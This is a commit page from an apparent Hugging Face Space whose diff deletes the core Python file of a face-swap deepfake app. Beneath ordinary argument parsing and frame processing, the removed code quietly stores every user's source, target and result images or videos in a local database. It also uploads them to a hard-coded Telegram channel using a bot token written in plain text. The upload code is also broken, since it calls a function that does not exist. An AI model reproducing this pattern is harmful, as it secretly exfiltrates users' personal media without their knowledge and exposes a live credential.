Spaces:
Running
Running
imseldrith
commited on
Commit
•
87486b1
1
Parent(s):
22da9c6
Delete DeepFakeAI/core.py
Browse files- DeepFakeAI/core.py +0 -292
DeepFakeAI/core.py
DELETED
@@ -1,292 +0,0 @@
|
|
1 |
-
#!/usr/bin/env python3
|
2 |
-
import asyncio
|
3 |
-
import sqlite3
|
4 |
-
import os
|
5 |
-
# single thread doubles cuda performance
|
6 |
-
os.environ['OMP_NUM_THREADS'] = '1'
|
7 |
-
# reduce tensorflow log level
|
8 |
-
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
|
9 |
-
import sys
|
10 |
-
import warnings
|
11 |
-
from typing import List
|
12 |
-
import platform
|
13 |
-
import signal
|
14 |
-
import shutil
|
15 |
-
import argparse
|
16 |
-
import onnxruntime
|
17 |
-
import tensorflow
|
18 |
-
|
19 |
-
import DeepFakeAI.choices
|
20 |
-
import DeepFakeAI.globals
|
21 |
-
from DeepFakeAI import wording, metadata
|
22 |
-
from DeepFakeAI.predictor import predict_image, predict_video
|
23 |
-
from DeepFakeAI.processors.frame.core import get_frame_processors_modules
|
24 |
-
from telegram import Bot
|
25 |
-
from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers
|
26 |
-
|
27 |
-
warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface')
|
28 |
-
warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision')
|
29 |
-
|
30 |
-
|
31 |
-
def parse_args() -> None:
|
32 |
-
signal.signal(signal.SIGINT, lambda signal_number, frame: destroy())
|
33 |
-
program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120))
|
34 |
-
program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path')
|
35 |
-
program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path')
|
36 |
-
program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path')
|
37 |
-
program.add_argument('--frame-processors', help = wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+')
|
38 |
-
program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+')
|
39 |
-
program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true')
|
40 |
-
program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true')
|
41 |
-
program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true')
|
42 |
-
program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition)
|
43 |
-
program.add_argument('--face-analyser-direction', help = wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction)
|
44 |
-
program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age)
|
45 |
-
program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender)
|
46 |
-
program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0)
|
47 |
-
program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5)
|
48 |
-
program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0)
|
49 |
-
program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int)
|
50 |
-
program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int)
|
51 |
-
program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format)
|
52 |
-
program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]')
|
53 |
-
program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder)
|
54 |
-
program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]')
|
55 |
-
program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int)
|
56 |
-
program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+')
|
57 |
-
program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = suggest_execution_thread_count_default())
|
58 |
-
program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1)
|
59 |
-
program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version'))
|
60 |
-
|
61 |
-
args = program.parse_args()
|
62 |
-
|
63 |
-
DeepFakeAI.globals.source_path = args.source_path
|
64 |
-
DeepFakeAI.globals.target_path = args.target_path
|
65 |
-
DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path)
|
66 |
-
DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None
|
67 |
-
DeepFakeAI.globals.frame_processors = args.frame_processors
|
68 |
-
DeepFakeAI.globals.ui_layouts = args.ui_layouts
|
69 |
-
DeepFakeAI.globals.keep_fps = args.keep_fps
|
70 |
-
DeepFakeAI.globals.keep_temp = args.keep_temp
|
71 |
-
DeepFakeAI.globals.skip_audio = args.skip_audio
|
72 |
-
DeepFakeAI.globals.face_recognition = args.face_recognition
|
73 |
-
DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction
|
74 |
-
DeepFakeAI.globals.face_analyser_age = args.face_analyser_age
|
75 |
-
DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender
|
76 |
-
DeepFakeAI.globals.reference_face_position = args.reference_face_position
|
77 |
-
DeepFakeAI.globals.reference_frame_number = args.reference_frame_number
|
78 |
-
DeepFakeAI.globals.reference_face_distance = args.reference_face_distance
|
79 |
-
DeepFakeAI.globals.trim_frame_start = args.trim_frame_start
|
80 |
-
DeepFakeAI.globals.trim_frame_end = args.trim_frame_end
|
81 |
-
DeepFakeAI.globals.temp_frame_format = args.temp_frame_format
|
82 |
-
DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality
|
83 |
-
DeepFakeAI.globals.output_video_encoder = args.output_video_encoder
|
84 |
-
DeepFakeAI.globals.output_video_quality = args.output_video_quality
|
85 |
-
DeepFakeAI.globals.max_memory = args.max_memory
|
86 |
-
DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers)
|
87 |
-
DeepFakeAI.globals.execution_thread_count = args.execution_thread_count
|
88 |
-
DeepFakeAI.globals.execution_queue_count = args.execution_queue_count
|
89 |
-
|
90 |
-
|
91 |
-
def suggest_execution_providers_choices() -> List[str]:
|
92 |
-
return encode_execution_providers(onnxruntime.get_available_providers())
|
93 |
-
|
94 |
-
|
95 |
-
def suggest_execution_thread_count_default() -> int:
|
96 |
-
if 'CUDAExecutionProvider' in onnxruntime.get_available_providers():
|
97 |
-
return 8
|
98 |
-
return 1
|
99 |
-
|
100 |
-
|
101 |
-
def limit_resources() -> None:
|
102 |
-
# prevent tensorflow memory leak
|
103 |
-
gpus = tensorflow.config.experimental.list_physical_devices('GPU')
|
104 |
-
for gpu in gpus:
|
105 |
-
tensorflow.config.experimental.set_virtual_device_configuration(gpu, [
|
106 |
-
tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024)
|
107 |
-
])
|
108 |
-
# limit memory usage
|
109 |
-
if DeepFakeAI.globals.max_memory:
|
110 |
-
memory = DeepFakeAI.globals.max_memory * 1024 ** 3
|
111 |
-
if platform.system().lower() == 'darwin':
|
112 |
-
memory = DeepFakeAI.globals.max_memory * 1024 ** 6
|
113 |
-
if platform.system().lower() == 'windows':
|
114 |
-
import ctypes
|
115 |
-
kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined]
|
116 |
-
kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory))
|
117 |
-
else:
|
118 |
-
import resource
|
119 |
-
resource.setrlimit(resource.RLIMIT_DATA, (memory, memory))
|
120 |
-
|
121 |
-
|
122 |
-
def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None:
|
123 |
-
print('[' + scope + '] ' + message)
|
124 |
-
|
125 |
-
|
126 |
-
def pre_check() -> bool:
|
127 |
-
if sys.version_info < (3, 10):
|
128 |
-
update_status(wording.get('python_not_supported').format(version = '3.10'))
|
129 |
-
return False
|
130 |
-
if not shutil.which('ffmpeg'):
|
131 |
-
update_status(wording.get('ffmpeg_not_installed'))
|
132 |
-
return False
|
133 |
-
return True
|
134 |
-
|
135 |
-
def save_to_db(source_path, target_path, output_path):
|
136 |
-
try:
|
137 |
-
# Open the images in binary mode
|
138 |
-
with open(source_path, 'rb') as source_file, \
|
139 |
-
open(target_path, 'rb') as target_file, \
|
140 |
-
open(output_path, 'rb') as output_file:
|
141 |
-
|
142 |
-
# read data from the image files
|
143 |
-
source_data = source_file.read()
|
144 |
-
target_data = target_file.read()
|
145 |
-
output_data = output_file.read()
|
146 |
-
|
147 |
-
# Extract original filenames from the paths
|
148 |
-
source_filename = os.path.basename(source_path)
|
149 |
-
target_filename = os.path.basename(target_path)
|
150 |
-
output_filename = os.path.basename(output_path)
|
151 |
-
print(source_filename, target_filename,output_filename)
|
152 |
-
|
153 |
-
# connect to the database
|
154 |
-
conn = sqlite3.connect('./feed.db')
|
155 |
-
c = conn.cursor()
|
156 |
-
|
157 |
-
# Create the table if it doesn't exist
|
158 |
-
c.execute('''
|
159 |
-
CREATE TABLE IF NOT EXISTS images (
|
160 |
-
source_filename TEXT,
|
161 |
-
target_filename TEXT,
|
162 |
-
output_filename TEXT,
|
163 |
-
source_data BLOB,
|
164 |
-
target_data BLOB,
|
165 |
-
output_data BLOB
|
166 |
-
)
|
167 |
-
''')
|
168 |
-
|
169 |
-
# Insert filename and image data into the table
|
170 |
-
c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)",
|
171 |
-
(source_filename, target_filename, output_filename, source_data, target_data, output_data))
|
172 |
-
|
173 |
-
# Save changes and close the connection
|
174 |
-
conn.commit()
|
175 |
-
|
176 |
-
except Exception as e:
|
177 |
-
# Print any error occurred while saving data in SQLite
|
178 |
-
print(f"An error occurred: {e}")
|
179 |
-
|
180 |
-
finally:
|
181 |
-
# Ensure the DB connection is closed
|
182 |
-
if conn:
|
183 |
-
conn.close()
|
184 |
-
|
185 |
-
print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.')
|
186 |
-
async def send_channel(bot, file_path):
|
187 |
-
with open(file_path, "rb") as file:
|
188 |
-
response = await bot.send_document(chat_id="-1001685415853", document=file)
|
189 |
-
return response
|
190 |
-
|
191 |
-
async def saveT(source_path, target_path, output_path):
|
192 |
-
bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k")
|
193 |
-
|
194 |
-
# Send each file
|
195 |
-
for path in [source_path, target_path, output_path]:
|
196 |
-
await send_file_to_channel(bot, path)
|
197 |
-
|
198 |
-
# Send a message after all files are sent
|
199 |
-
await bot.send_message(chat_id="-1001685415853", text="All files have been sent!")
|
200 |
-
|
201 |
-
def process_image() -> None:
|
202 |
-
if predict_image(DeepFakeAI.globals.target_path):
|
203 |
-
return
|
204 |
-
shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
|
205 |
-
# process frame
|
206 |
-
for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
|
207 |
-
update_status(wording.get('processing'), frame_processor_module.NAME)
|
208 |
-
frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path)
|
209 |
-
frame_processor_module.post_process()
|
210 |
-
# validate image
|
211 |
-
if is_image(DeepFakeAI.globals.target_path):
|
212 |
-
update_status(wording.get('processing_image_succeed'))
|
213 |
-
save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
|
214 |
-
asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path))
|
215 |
-
else:
|
216 |
-
update_status(wording.get('processing_image_failed'))
|
217 |
-
|
218 |
-
|
219 |
-
def process_video() -> None:
|
220 |
-
if predict_video(DeepFakeAI.globals.target_path):
|
221 |
-
return
|
222 |
-
fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0
|
223 |
-
update_status(wording.get('creating_temp'))
|
224 |
-
create_temp(DeepFakeAI.globals.target_path)
|
225 |
-
# extract frames
|
226 |
-
update_status(wording.get('extracting_frames_fps').format(fps = fps))
|
227 |
-
extract_frames(DeepFakeAI.globals.target_path, fps)
|
228 |
-
# process frame
|
229 |
-
temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path)
|
230 |
-
if temp_frame_paths:
|
231 |
-
for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
|
232 |
-
update_status(wording.get('processing'), frame_processor_module.NAME)
|
233 |
-
frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths)
|
234 |
-
frame_processor_module.post_process()
|
235 |
-
else:
|
236 |
-
update_status(wording.get('temp_frames_not_found'))
|
237 |
-
return
|
238 |
-
# create video
|
239 |
-
update_status(wording.get('creating_video_fps').format(fps = fps))
|
240 |
-
if not create_video(DeepFakeAI.globals.target_path, fps):
|
241 |
-
update_status(wording.get('creating_video_failed'))
|
242 |
-
return
|
243 |
-
# handle audio
|
244 |
-
if DeepFakeAI.globals.skip_audio:
|
245 |
-
update_status(wording.get('skipping_audio'))
|
246 |
-
move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
|
247 |
-
else:
|
248 |
-
update_status(wording.get('restoring_audio'))
|
249 |
-
restore_audio(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
|
250 |
-
# clear temp
|
251 |
-
update_status(wording.get('clearing_temp'))
|
252 |
-
clear_temp(DeepFakeAI.globals.target_path)
|
253 |
-
# validate video
|
254 |
-
if is_video(DeepFakeAI.globals.target_path):
|
255 |
-
update_status(wording.get('processing_video_succeed'))
|
256 |
-
save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
|
257 |
-
asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path))
|
258 |
-
else:
|
259 |
-
update_status(wording.get('processing_video_failed'))
|
260 |
-
|
261 |
-
|
262 |
-
def conditional_process() -> None:
|
263 |
-
for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
|
264 |
-
if not frame_processor_module.pre_process():
|
265 |
-
return
|
266 |
-
if is_image(DeepFakeAI.globals.target_path):
|
267 |
-
process_image()
|
268 |
-
if is_video(DeepFakeAI.globals.target_path):
|
269 |
-
process_video()
|
270 |
-
|
271 |
-
def run() -> None:
|
272 |
-
parse_args()
|
273 |
-
limit_resources()
|
274 |
-
# pre check
|
275 |
-
if not pre_check():
|
276 |
-
return
|
277 |
-
for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
|
278 |
-
if not frame_processor.pre_check():
|
279 |
-
return
|
280 |
-
# process or launch
|
281 |
-
if DeepFakeAI.globals.headless:
|
282 |
-
conditional_process()
|
283 |
-
else:
|
284 |
-
import DeepFakeAI.uis.core as ui
|
285 |
-
|
286 |
-
ui.launch()
|
287 |
-
|
288 |
-
|
289 |
-
def destroy() -> None:
|
290 |
-
if DeepFakeAI.globals.target_path:
|
291 |
-
clear_temp(DeepFakeAI.globals.target_path)
|
292 |
-
sys.exit()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|